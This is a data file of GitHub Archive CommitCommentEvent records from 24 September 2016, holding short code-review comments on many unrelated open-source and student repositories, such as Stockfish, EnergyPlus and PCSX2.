{"id":"4612535176","type":"CommitCommentEvent","actor":{"login":"GabrielSalvadorCardoso"},"repo":{"name":"GabrielSalvadorCardoso/Planeja"},"payload":{"comment":{"id":19158110,"position":null,"line":null,"path":null,"commit_id":"247e7c41e0907c9da789c3e57f669adbac303d3d","created_at":"2016-09-24T13:31:32Z","updated_at":"2016-09-24T13:31:32Z","body":"Gravação dos dados em arquivos e possibilidade de consulta através do código da conta adicionados.\r\nTambém foi adicionada a função de calculo de juros"}},"created_at":"2016-09-24T13:31:32Z"}
{"id":"4612535384","type":"CommitCommentEvent","actor":{"login":"cafferoman"},"repo":{"name":"cafferoman/cafferoman_bot"},"payload":{"comment":{"id":19158111,"position":4,"line":231,"path":"bot/bot.lua","commit_id":"15a9ccd996d8f74c3ba301283e42681fc6e178be","created_at":"2016-09-24T13:31:41Z","updated_at":"2016-09-24T13:31:41Z","body":"@cafferoman_bot"}},"created_at":"2016-09-24T13:31:41Z"}
{"id":"4612536045","type":"CommitCommentEvent","actor":{"login":"cafferoman"},"repo":{"name":"cafferoman/cafferoman_bot"},"payload":{"comment":{"id":19158115,"position":5,"line":231,"path":"bot/bot.lua","commit_id":"15a9ccd996d8f74c3ba301283e42681fc6e178be","created_at":"2016-09-24T13:32:14Z","updated_at":"2016-09-24T13:32:14Z","body":"@cafferoman_bot"}},"created_at":"2016-09-24T13:32:14Z"}
{"id":"4612536295","type":"CommitCommentEvent","actor":{"login":"juancrr"},"repo":{"name":"juancrr/test_icbbdd"},"payload":{"comment":{"id":19158117,"position":1,"line":null,"path":"README.md","commit_id":"4bc266293c04ed7deb00a8007301002c60b30489","created_at":"2016-09-24T13:32:26Z","updated_at":"2016-09-24T13:32:26Z","body":"Tere"}},"created_at":"2016-09-24T13:32:26Z"}
{"id":"4612536964","type":"CommitCommentEvent","actor":{"login":"zonas0574"},"repo":{"name":"zonas0574/study"},"payload":{"comment":{"id":19158120,"position":null,"line":null,"path":null,"commit_id":"a717353586a21d08d049066363888cee526cfdad","created_at":"2016-09-24T13:32:58Z","updated_at":"2016-09-24T13:32:58Z","body":"readme"}},"created_at":"2016-09-24T13:32:58Z"}
{"id":"4612537310","type":"CommitCommentEvent","actor":{"login":"LitecoinNode"},"repo":{"name":"LitecoinNode/bootstrap.litecoinnode.org"},"payload":{"comment":{"id":19158121,"position":null,"line":null,"path":null,"commit_id":"67bea8c6630692a1090e8bfc3a5b67765d458f24","created_at":"2016-09-24T13:33:13Z","updated_at":"2016-09-24T13:33:13Z","body":"A SHA256 hash is already available."}},"created_at":"2016-09-24T13:33:13Z"}
{"id":"4612538610","type":"CommitCommentEvent","actor":{"login":"cafferoman"},"repo":{"name":"cafferoman/cafferoman_bot"},"payload":{"comment":{"id":19158122,"position":null,"line":null,"path":null,"commit_id":"15a9ccd996d8f74c3ba301283e42681fc6e178be","created_at":"2016-09-24T13:34:13Z","updated_at":"2016-09-24T13:34:13Z","body":"!idcafferoman_bot"}},"created_at":"2016-09-24T13:34:13Z"}
{"id":"4612540406","type":"CommitCommentEvent","actor":{"login":"ElectryDev"},"repo":{"name":"updateing/android_device_oneplus_bacon"},"payload":{"comment":{"id":19158129,"position":null,"line":null,"path":null,"commit_id":"9759ad6d7133f5d28f111817a7816839621a2f15","created_at":"2016-09-24T13:35:35Z","updated_at":"2016-09-24T13:35:35Z","body":"why?"}},"created_at":"2016-09-24T13:35:35Z"}
{"id":"4612544092","type":"CommitCommentEvent","actor":{"login":"etraicu"},"repo":{"name":"etraicu/Course_4_Wee_1_Assignment"},"payload":{"comment":{"id":19158149,"position":null,"line":null,"path":null,"commit_id":"37649003bc261987c0fbdd5eb380456435d6699c","created_at":"2016-09-24T13:38:33Z","updated_at":"2016-09-24T13:38:33Z","body":"x"}},"created_at":"2016-09-24T13:38:33Z"}
{"id":"4612544194","type":"CommitCommentEvent","actor":{"login":"killerwife"},"repo":{"name":"cmangos/mangos-tbc"},"payload":{"comment":{"id":19158150,"position":4,"line":9984,"path":"src/game/Unit.cpp","commit_id":"a16b6e58801e1e0a1d253a86378d646b339bd9d4","created_at":"2016-09-24T13:38:39Z","updated_at":"2016-09-24T13:38:39Z","body":"why 5 seconds?"}},"created_at":"2016-09-24T13:38:39Z"}
{"id":"4612544856","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19158152,"position":null,"line":null,"path":null,"commit_id":"0e914aa27f8a22058be58e5d9ad1800df7792708","created_at":"2016-09-24T13:39:10Z","updated_at":"2016-09-24T13:39:10Z","body":"4989-PreliminaryPIUTstatControl (mjwitte) - i386-Windows-7-VisualStudio-12: OK (2345 of 2345 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0e914aa27f8a22058be58e5d9ad1800df7792708-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0e914aa27f8a22058be58e5d9ad1800df7792708-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-24T13:39:10Z"}
{"id":"4612544866","type":"CommitCommentEvent","actor":{"login":"jorendorff"},"repo":{"name":"jorendorff/rust-grammar"},"payload":{"comment":{"id":19158153,"position":10,"line":10,"path":"Rust.g4","commit_id":"a17023dc6bd2a4632314eb693816525650c14cf8","created_at":"2016-09-24T13:39:10Z","updated_at":"2016-09-24T13:39:10Z","body":"That is good news!"}},"created_at":"2016-09-24T13:39:10Z"}
{"id":"4612546122","type":"CommitCommentEvent","actor":{"login":"mkiol"},"repo":{"name":"mkiol/ignotifier"},"payload":{"comment":{"id":19158154,"position":null,"line":null,"path":null,"commit_id":"502dc4e663f34ee003d687bc31c4df7e0ed0e74f","created_at":"2016-09-24T13:40:09Z","updated_at":"2016-09-24T13:40:09Z","body":"Compatibility for [GNotifier](https://github.com/mkiol/GNotifier) add-on\r\n---------------------------------------------------------------------------------------------------------------\r\n\r\nThe source of the problem is how the reference to notification API is get is app.js file. Before this commit it was done by global variable `var notifications = require(\"sdk/notifications\")` so, `var notifications` always refers to notification API available at the moment when the FF was started. Gnotifier replaces standard notification API with new one, and due to fact that it is not possible to force one extension to be loaded before another, sometimes ignotifier sends notifications bypassing new implementation of notification API provided by Gnotifier. This issue can be easily fixed by not referring to API globally. If `require(\"sdk/notifications\")` is get just before sending notification, will always refers to modified API and notifications will not bypass Gnotifier.\r\n\r\n"}},"created_at":"2016-09-24T13:40:09Z"}
{"id":"4612551935","type":"CommitCommentEvent","actor":{"login":"rohitmanglik"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":19158166,"position":12,"line":20,"path":"geocodertest.py","commit_id":"3e6f0d48006c47ad19fbd8772884b3550fbe623c","created_at":"2016-09-24T13:44:41Z","updated_at":"2016-09-24T13:44:41Z","body":"@shashwat-vik Please add your key as well."}},"created_at":"2016-09-24T13:44:41Z"}
{"id":"4612552082","type":"CommitCommentEvent","actor":{"login":"maheshmasale"},"repo":{"name":"maheshmasale/libraryRoomManagement"},"payload":{"comment":{"id":19158167,"position":4,"line":6,"path":".idea/workspace.xml","commit_id":"27ba8f325fb40cfec1f41c3e3d221bfb665d8de6","created_at":"2016-09-24T13:44:48Z","updated_at":"2016-09-24T13:44:48Z","body":"needs to ignore this file."}},"created_at":"2016-09-24T13:44:48Z"}
{"id":"4612554441","type":"CommitCommentEvent","actor":{"login":"ozasadnyy"},"repo":{"name":"gdg-x/hoverboard"},"payload":{"comment":{"id":19158172,"position":null,"line":null,"path":null,"commit_id":"7f9888887c0b4ddd7c1518d5c38eb90501c1dd22","created_at":"2016-09-24T13:46:41Z","updated_at":"2016-09-24T13:46:41Z","body":"Don't worry, I will add it manually"}},"created_at":"2016-09-24T13:46:41Z"}
{"id":"4612558443","type":"CommitCommentEvent","actor":{"login":"daikk115"},"repo":{"name":"cloudcomputinghust/CloudTestbed"},"payload":{"comment":{"id":19158183,"position":18,"line":18,"path":"k58_test/le_huynh_duc/mydashboard/mypanel/views.py","commit_id":"d69b2f0bb7b85eebbfc4e6588e1a4a0ca3f75067","created_at":"2016-09-24T13:50:04Z","updated_at":"2016-09-24T13:50:04Z","body":"BASIC.container ->> mydashboard.containers"}},"created_at":"2016-09-24T13:50:04Z"}
{"id":"4612558737","type":"CommitCommentEvent","actor":{"login":"blueyed"},"repo":{"name":"neomake/neomake"},"payload":{"comment":{"id":19158185,"position":null,"line":null,"path":null,"commit_id":"07f3807ae950868764c9d28b4b9dd5ef64288abb","created_at":"2016-09-24T13:50:17Z","updated_at":"2016-09-24T13:50:17Z","body":"Corresponding test in https://github.com/neomake/neomake/pull/635."}},"created_at":"2016-09-24T13:50:17Z"}
{"id":"4612561293","type":"CommitCommentEvent","actor":{"login":"anastasiya-solodkaya"},"repo":{"name":"grigoryev-k/PollApplication"},"payload":{"comment":{"id":19158189,"position":null,"line":null,"path":null,"commit_id":"d97b4bdaeb68c65bbae539fdd8cc54892a7a04d9","created_at":"2016-09-24T13:52:22Z","updated_at":"2016-09-24T13:52:22Z","body":"Please, remove .iml files (Idea project files)"}},"created_at":"2016-09-24T13:52:22Z"}
{"id":"4612563235","type":"CommitCommentEvent","actor":{"login":"Ben-unbelieveable"},"repo":{"name":"Ben-unbelieveable/Ben-unbelieveable.github.io"},"payload":{"comment":{"id":19158191,"position":null,"line":null,"path":null,"commit_id":"766ce6b23ac694b28107e7963c729988ed87d599","created_at":"2016-09-24T13:53:47Z","updated_at":"2016-09-24T13:53:47Z","body":"删除部分文本"}},"created_at":"2016-09-24T13:53:47Z"}
{"id":"4612563813","type":"CommitCommentEvent","actor":{"login":"rix1337"},"repo":{"name":"rix1337/RSScrawler"},"payload":{"comment":{"id":19158192,"position":30,"line":629,"path":"RSScrawler.py","commit_id":"91ec1f8fdc5ca2bf3c1022ae3507521b0994397e","created_at":"2016-09-24T13:54:10Z","updated_at":"2016-09-24T13:54:10Z","body":"Das war lustig 👍 "}},"created_at":"2016-09-24T13:54:10Z"}
{"id":"4612567390","type":"CommitCommentEvent","actor":{"login":"dschlaep"},"repo":{"name":"Burke-Lauenroth-Lab/SoilWat_R_Wrapper"},"payload":{"comment":{"id":19158199,"position":null,"line":null,"path":null,"commit_id":"042a506a88a4c4545863c76a402a7f240aecfb84","created_at":"2016-09-24T13:56:53Z","updated_at":"2016-09-24T13:56:53Z","body":"This commit passed all tests: 1-5"}},"created_at":"2016-09-24T13:56:53Z"}
{"id":"4612569218","type":"CommitCommentEvent","actor":{"login":"CrazyMonkey6762"},"repo":{"name":"CrazyMonkey6762/C-Study"},"payload":{"comment":{"id":19158204,"position":6,"line":16,"path":"README.md","commit_id":"64b367926a7328d622018a9d64c700ac90e20e06","created_at":"2016-09-24T13:58:16Z","updated_at":"2016-09-24T13:58:16Z","body":"别闹"}},"created_at":"2016-09-24T13:58:16Z"}
{"id":"4612572165","type":"CommitCommentEvent","actor":{"login":"lefebv-z"},"repo":{"name":"WorldsParticle/IrrlichtPrototype"},"payload":{"comment":{"id":19158215,"position":6,"line":34,"path":"include/Core.h","commit_id":"cceffef6197989d24b178c330be8111f83c940fe","created_at":"2016-09-24T14:00:19Z","updated_at":"2016-09-24T14:00:19Z","body":"on utilise plus doxygen normalement, faudrait virer les commentaires"}},"created_at":"2016-09-24T14:00:19Z"}
{"id":"4612573520","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19158216,"position":null,"line":null,"path":null,"commit_id":"2cc671ad1c0810ec64d4be8428510def0fb57f80","created_at":"2016-09-24T14:01:07Z","updated_at":"2016-09-24T14:01:07Z","body":"Very smart try. Good luck!"}},"created_at":"2016-09-24T14:01:07Z"}
{"id":"4612574086","type":"CommitCommentEvent","actor":{"login":"iesteban"},"repo":{"name":"Semillas/semillas_backend"},"payload":{"comment":{"id":19158217,"position":11,"line":11,"path":"webapp/static/webapp/js/geoexample.js","commit_id":"24e6a225d953bcdeb573063b84a3199a82863511","created_at":"2016-09-24T14:01:30Z","updated_at":"2016-09-24T14:01:30Z","body":"I think it's not working in https://alpha.semillasocial.org/webapp/geolocation because is mixing htttps and http. "}},"created_at":"2016-09-24T14:01:30Z"}
{"id":"4612576495","type":"CommitCommentEvent","actor":{"login":"marhyorh"},"repo":{"name":"marhyorh/todo-mvc"},"payload":{"comment":{"id":19158218,"position":null,"line":null,"path":null,"commit_id":"5fd0088b52b6c24821dfaf37b699855700acb177","created_at":"2016-09-24T14:03:13Z","updated_at":"2016-09-24T14:03:13Z","body":"I'll to configure my eslint to point out this kinda issue in the future. Thanks!"}},"created_at":"2016-09-24T14:03:13Z"}
{"id":"4612577185","type":"CommitCommentEvent","actor":{"login":"jihdeh"},"repo":{"name":"marhyorh/todo-mvc"},"payload":{"comment":{"id":19158220,"position":null,"line":null,"path":null,"commit_id":"5fd0088b52b6c24821dfaf37b699855700acb177","created_at":"2016-09-24T14:03:46Z","updated_at":"2016-09-24T14:03:46Z","body":"👍 "}},"created_at":"2016-09-24T14:03:46Z"}
{"id":"4612579105","type":"CommitCommentEvent","actor":{"login":"jbushmaster007"},"repo":{"name":"jbushmaster007/android"},"payload":{"comment":{"id":19158223,"position":5,"line":21,"path":"Readme.md","commit_id":"e4c4b724b3a65d1edee7cac2721340039cd9105b","created_at":"2016-09-24T14:05:11Z","updated_at":"2016-09-24T14:05:11Z","body":"https://github.com/jbushmaster007/android.git"}},"created_at":"2016-09-24T14:05:11Z"}
{"id":"4612579775","type":"CommitCommentEvent","actor":{"login":"jbushmaster007"},"repo":{"name":"jbushmaster007/android"},"payload":{"comment":{"id":19158224,"position":null,"line":null,"path":null,"commit_id":"e4c4b724b3a65d1edee7cac2721340039cd9105b","created_at":"2016-09-24T14:05:41Z","updated_at":"2016-09-24T14:05:41Z","body":"https://github.com/jbushmaster007/android.git"}},"created_at":"2016-09-24T14:05:41Z"}
{"id":"4612580869","type":"CommitCommentEvent","actor":{"login":"InhoChoi"},"repo":{"name":"All-door/Artik_internal_controller"},"payload":{"comment":{"id":19158230,"position":null,"line":null,"path":null,"commit_id":"b837a83d872494e78bfed4d97e3693936369ecea","created_at":"2016-09-24T14:06:26Z","updated_at":"2016-09-24T14:06:26Z","body":"getTemperature, getHumidity 중복되는 부분도 많고 너무 길음\r\n\r\n동시에 온도, 습도를 받는 함수를 제작 하거나\r\n\r\n중복되는 코드를 제거 하는 쪽이 좋을듯"}},"created_at":"2016-09-24T14:06:26Z"}
{"id":"4612583629","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":19158237,"position":null,"line":null,"path":null,"commit_id":"9451be3af8974f2b059719b4e6f03b9533446a1e","created_at":"2016-09-24T14:08:23Z","updated_at":"2016-09-24T14:08:23Z","body":"This is called Islands. You can simply use this:\r\n b = e->semiopenFiles[Us];  \r\n e->islands[Us] = popcount(b & ~(b >> 1));  \r\n\r\nFor some penalties that were tried see:\r\nhttps://groups.google.com/forum/?fromgroups=#!searchin/fishcooking_results/islands$20rocky%7Csort:relevance/fishcooking_results/dObZHtxzzDA/HCX9wfkhAgAJ\r\n"}},"created_at":"2016-09-24T14:08:23Z"}
{"id":"4612589101","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"grapherd/phonebook-1"},"payload":{"comment":{"id":19158243,"position":null,"line":null,"path":null,"commit_id":"f561efa41ca9546e87a8e883096bcf3e78c5b64f","created_at":"2016-09-24T14:12:23Z","updated_at":"2016-09-24T14:12:23Z","body":"Don't mention file name in the subject of GIT commit messages. Too stupid."}},"created_at":"2016-09-24T14:12:23Z"}
{"id":"4612589209","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19158244,"position":null,"line":null,"path":null,"commit_id":"2cc671ad1c0810ec64d4be8428510def0fb57f80","created_at":"2016-09-24T14:12:28Z","updated_at":"2016-09-24T14:12:28Z","body":"@snicolet I have submitted a test for a tuning patch I only would like to run in case this should fail (so now at priority -1)... possibly already attempted and it is hard to say whether that might help:\r\n[Favor pawn chains toward center by midgame square bias](http://tests.stockfishchess.org/tests/view/57e6883f0ebc59763f358dcc)"}},"created_at":"2016-09-24T14:12:28Z"}
{"id":"4612592605","type":"CommitCommentEvent","actor":{"login":"Bananeweizen"},"repo":{"name":"cgeo/cgeo"},"payload":{"comment":{"id":19158247,"position":9,"line":53,"path":"main/src/cgeo/geocaching/maps/brouter/BRouter.java","commit_id":"7f6b319e189d23e979bd30c1b2fcb3fb4b7882eb","created_at":"2016-09-24T14:15:02Z","updated_at":"2016-09-24T14:15:02Z","body":"It's always interesting how selective our brain is working. :) I've read that method multiple times today without noticing."}},"created_at":"2016-09-24T14:15:02Z"}
{"id":"4612594069","type":"CommitCommentEvent","actor":{"login":"socksy"},"repo":{"name":"ClojureBridgeLondon/clojurebridgelondon.github.io"},"payload":{"comment":{"id":19158250,"position":17,"line":60,"path":"index.html","commit_id":"453361ebf306023beffba3ac36d4ba3f4137cf5f","created_at":"2016-09-24T14:16:05Z","updated_at":"2016-09-24T14:16:05Z","body":"The reasoning on the ClojureBerlin site for not specifying \"transgender\" was simply because \"transgender\" is not a gender, and a transgender woman is also a woman. Of course, it's a struggle then to signify that you want to be explicitly inclusive... and we hoped that it would be obvious from the explicit acknowledgement of non-binary. However, getting the language wrong of \"identifying as transgender\", is something we tried to avoid here.\r\nIn German, you'll see in the paragraph above we also use \"FLTI\", which translates to \"Woman, Lesbian, Transgender, Intersex\". It's unfortunate that English doesn't have such an acronym in common usage."}},"created_at":"2016-09-24T14:16:05Z"}
{"id":"4612595051","type":"CommitCommentEvent","actor":{"login":"nradulovic"},"repo":{"name":"netico-solutions/xdrv-spi"},"payload":{"comment":{"id":19158252,"position":null,"line":null,"path":null,"commit_id":"bf6577696f334f433d5d07f1368b078a080e0ad4","created_at":"2016-09-24T14:16:52Z","updated_at":"2016-09-24T14:16:52Z","body":"Yes, in menuconfig, disable them.\n\nOn Sun, Sep 18, 2016 at 8:45 AM, Ziyi Hong <notifications@github.com> wrote:\n\n> Hello, may I ask a question about \"disable in-kernel omap drivers\"? Why\n> should disable these drivers and how to disable them (in menuconfig)?\n> Thanks!\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/netico-solutions/xdrv-spi/commit/bf6577696f334f433d5d07f1368b078a080e0ad4#commitcomment-19069498>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AESbCrNQnx-yUfaMuWvuxuRBAza6EwWpks5qrN4HgaJpZM4J_0ef>\n> .\n>\n"}},"created_at":"2016-09-24T14:16:52Z"}
{"id":"4612595801","type":"CommitCommentEvent","actor":{"login":"mattbrailsford"},"repo":{"name":"leekelleher/umbraco-ditto"},"payload":{"comment":{"id":19158253,"position":21,"line":52,"path":"src/Our.Umbraco.Ditto/ComponentModel/Processors/DittoFactoryAttribute.cs","commit_id":"3781d9fbb919bcec23c1614012a4101428d949b8","created_at":"2016-09-24T14:17:23Z","updated_at":"2016-09-24T14:17:23Z","body":"I guess it depends how expensive .GetTypes() is? In theory, this is only relevant when a base type is declared in app_code, in which case, if it is, we should only check the app_code assembly for implementing types as that is the only assembly that could possibly have implementing types in it (and is that bug that is in core). In theory, there shouldn't be any assembly loading expense (well, maybe 1 in the IsAppCodeAssembly helper, but I do cache that) so it is just down to GetTypes perf. I think given the edge case it is, it may be good enough. I've also added the ability to explicitly pass in AllowedTypes so that you can skip the lookup all together if perf is an issue."}},"created_at":"2016-09-24T14:17:23Z"}
{"id":"4612595966","type":"CommitCommentEvent","actor":{"login":"UKirsche"},"repo":{"name":"UKirsche/DemoMidgardUI"},"payload":{"comment":{"id":19158254,"position":33,"line":108,"path":"Scripts/HandleLernItemClick.cs","commit_id":"2e57570c1426482ffef7a5b38532818668c0d0ff","created_at":"2016-09-24T14:17:31Z","updated_at":"2016-09-24T14:17:31Z","body":"Sehr gut, muss hier raus\r\n"}},"created_at":"2016-09-24T14:17:31Z"}
{"id":"4612598700","type":"CommitCommentEvent","actor":{"login":"montogeek"},"repo":{"name":"MoOx/phenomic"},"payload":{"comment":{"id":19158257,"position":null,"line":null,"path":null,"commit_id":"a29759263b8df488f3a2f24e6e638c7969193f59","created_at":"2016-09-24T14:19:27Z","updated_at":"2016-09-24T14:19:27Z","body":"Thanks!"}},"created_at":"2016-09-24T14:19:27Z"}
{"id":"4612599233","type":"CommitCommentEvent","actor":{"login":"ThomasConnor"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19158258,"position":null,"line":null,"path":null,"commit_id":"76494e5f9ced188d15e218ac365b43cbd748f49d","created_at":"2016-09-24T14:19:50Z","updated_at":"2016-09-24T14:19:50Z","body":"Does the Insert key still correctly toggle mipmapping with this change? It says \"\"GSdx: (Software) Mipmapping is now...\" in the console but thats just a string as seen here - https://github.com/PCSX2/pcsx2/blob/master/plugins/GSdx/GSRenderer.cpp#L600"}},"created_at":"2016-09-24T14:19:50Z"}
{"id":"4612600048","type":"CommitCommentEvent","actor":{"login":"mkiol"},"repo":{"name":"mkiol/GNotifier"},"payload":{"comment":{"id":19158260,"position":null,"line":null,"path":null,"commit_id":"75985da680526c33cd45fd55b0484efcaa594307","created_at":"2016-09-24T14:20:22Z","updated_at":"2016-09-24T14:20:22Z","body":"There is a `+` at the beginning of all lines! Could you please make correction?\r\n\r\n@tooomm Thanks for noticing it"}},"created_at":"2016-09-24T14:20:22Z"}
{"id":"4612601008","type":"CommitCommentEvent","actor":{"login":"Ummon"},"repo":{"name":"klacke/yaws"},"payload":{"comment":{"id":19158261,"position":null,"line":null,"path":null,"commit_id":"3364e06d56e9bc9261ec3b2e63b4323af4aaeac9","created_at":"2016-09-24T14:21:04Z","updated_at":"2016-09-24T14:21:04Z","body":"It seems that this doesn't work anymore : \r\n`<div class=\"<erl>out(_) -> {html, f()}.</erl>\"`/>\r\nI know it's ugly."}},"created_at":"2016-09-24T14:21:04Z"}
{"id":"4612601314","type":"CommitCommentEvent","actor":{"login":"OllegM"},"repo":{"name":"OllegM/TSFruits"},"payload":{"comment":{"id":19158262,"position":6,"line":10,"path":"first.ts","commit_id":"6015f8f0129dc21eabd3bd06b614ee7a2c5dc7a3","created_at":"2016-09-24T14:21:16Z","updated_at":"2016-09-24T14:21:16Z","body":"Please add type name."}},"created_at":"2016-09-24T14:21:16Z"}
{"id":"4612604105","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19158267,"position":null,"line":null,"path":null,"commit_id":"fc5b8c5c900bd7eb75f0b4d6d35c4fe4751db000","created_at":"2016-09-24T14:23:34Z","updated_at":"2016-09-24T14:23:34Z","body":"develop (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (1769 of 1769 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc5b8c5c900bd7eb75f0b4d6d35c4fe4751db000-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc5b8c5c900bd7eb75f0b4d6d35c4fe4751db000-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-24T14:23:34Z"}
{"id":"4612604994","type":"CommitCommentEvent","actor":{"login":"Made-Right-America"},"repo":{"name":"doesdev/jquery-video-lightning"},"payload":{"comment":{"id":19158270,"position":null,"line":null,"path":null,"commit_id":"ac485df1efb5269868f975b79b4cf6b959fce397","created_at":"2016-09-24T14:24:10Z","updated_at":"2016-09-24T14:24:10Z","body":"Thanks to all your hard work I'm able to concentrate on the very reason I use you script.  If it's possible may I ask is it is possible to give the playlist a name. (**Untitled playlist**)?\r\n\r\nEither way I thank you so much for all that you make available. The more  we learn in life enables to earn more in our lifetimes. That's why I try to do my part to teach new skills to others. Soon your work will be used by millions. I created a new method of creating jobs on a national level without the need to use our tax dollars. \r\n\r\nAgain, thanks for all your talent you share. \r\n\r\nMichael Montana"}},"created_at":"2016-09-24T14:24:10Z"}
{"id":"4612606761","type":"CommitCommentEvent","actor":{"login":"mcostalba"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19158273,"position":null,"line":null,"path":null,"commit_id":"9607d25e1f110f25cad39363daf16bb346afd522","created_at":"2016-09-24T14:25:28Z","updated_at":"2016-09-24T14:25:28Z","body":"But this should not happen at all, fixing the see is not the correct\nsolution.\n\nThe correct solution is that this should not happen.\n\nI will investigate this issue possibly tomorrow.\n\n\n\nOn Saturday, September 24, 2016, Stéphane Nicolet <notifications@github.com>\nwrote:\n\n> @mcostalba <https://github.com/mcostalba> Because the current SF is\n> dependent of the SEE values given for illegal moves. Our pruning strategies\n> in search depends on how many illegal moves we generates in MovePicker, and\n> what SEE values we give to these illegal moves.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/snicolet/Stockfish/commit/9607d25e1f110f25cad39363daf16bb346afd522#commitcomment-19157539>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABDGAd-grHMcZegMF-tuII5IGWoFiFyAks5qtP_7gaJpZM4KEQlO>\n> .\n>\n"}},"created_at":"2016-09-24T14:25:28Z"}
{"id":"4612607458","type":"CommitCommentEvent","actor":{"login":"ajaymenon18"},"repo":{"name":"ajaymenon18/Eudyptulachall"},"payload":{"comment":{"id":19158276,"position":null,"line":null,"path":null,"commit_id":"f61d40d0b3c293e6856cfb77daa15aa21a0b6205","created_at":"2016-09-24T14:25:58Z","updated_at":"2016-09-24T14:25:58Z","body":"Please be the first one to reply to the chall "}},"created_at":"2016-09-24T14:25:58Z"}
{"id":"4612611540","type":"CommitCommentEvent","actor":{"login":"JensVernelenTM"},"repo":{"name":"JensVernelenTM/Ex1_Jens_Vernelen_TM"},"payload":{"comment":{"id":19158287,"position":null,"line":null,"path":null,"commit_id":"e669e41682519d4103645abe6678d982b254c609","created_at":"2016-09-24T14:29:11Z","updated_at":"2016-09-24T14:29:11Z","body":"Deze is verkeerd gelopen, ik heb het volgende commando uitgevoerd: \r\n`git merge --no-ff 8b7eadf39d3d47d9d14c52a4a126cfeec5fea036`\r\nIk dacht dat dit het commando was om van een vorig commit te merge."}},"created_at":"2016-09-24T14:29:11Z"}
{"id":"4612613512","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19158294,"position":null,"line":null,"path":null,"commit_id":"df7f50992c70182abf80a77433eeaea2ce3e1cd6","created_at":"2016-09-24T14:30:37Z","updated_at":"2016-09-24T14:30:37Z","body":"Of course, here an example from bench-position pos #1:\r\n\r\n```\r\n +---+---+---+---+---+---+---+---+\r\n | r | n | b | q | k |   |   | r |\r\n +---+---+---+---+---+---+---+---+\r\n |   | p | p |   |   | p | p | p |\r\n +---+---+---+---+---+---+---+---+\r\n | p |   |   |   |   |   |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   | p |   |   |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   | b |   | P | N | B |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   |   |   |   |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n | P | P | P |   | Q | P | P | P |\r\n +---+---+---+---+---+---+---+---+\r\n | R |   |   |   | K | B | N | R |\r\n +---+---+---+---+---+---+---+---+\r\n\r\nFen: rnbqk2r/1pp2ppp/p7/3p4/1b1PNB2/8/PPP1QPPP/R3KBNR w KQkq - 1 8\r\nKey: BF95115A6C0C6F6C\r\nCheckers: b4 \r\n´´´\r\nHere after Qd2 and BxQd2 our last implementations thought that NxBd2 is a move discovering a check.\r\nThis version recognizes that NxBd2 is no more a discovering check move because the Queen moved already. However in this case the outcome of see doesn't change, I will try to find one ..."}},"created_at":"2016-09-24T14:30:37Z"}
{"id":"4612613867","type":"CommitCommentEvent","actor":{"login":"karrak1"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":19158298,"position":null,"line":null,"path":null,"commit_id":"df3ff94fd19710e3b4b72cd9bf44dc968611e367","created_at":"2016-09-24T14:30:52Z","updated_at":"2016-09-24T14:30:52Z","body":"the only way not to go.\r\nif delete l1070 continue, it's OK then, or new foreach email_templates."}},"created_at":"2016-09-24T14:30:52Z"}
{"id":"4612616837","type":"CommitCommentEvent","actor":{"login":"zhangbaihua"},"repo":{"name":"zhangbaihua/myProject"},"payload":{"comment":{"id":19158302,"position":null,"line":null,"path":null,"commit_id":"3524295e42ca8cbcad4c27d07f14b8a05f6e6b94","created_at":"2016-09-24T14:33:09Z","updated_at":"2016-09-24T14:33:09Z","body":"测试！！"}},"created_at":"2016-09-24T14:33:09Z"}
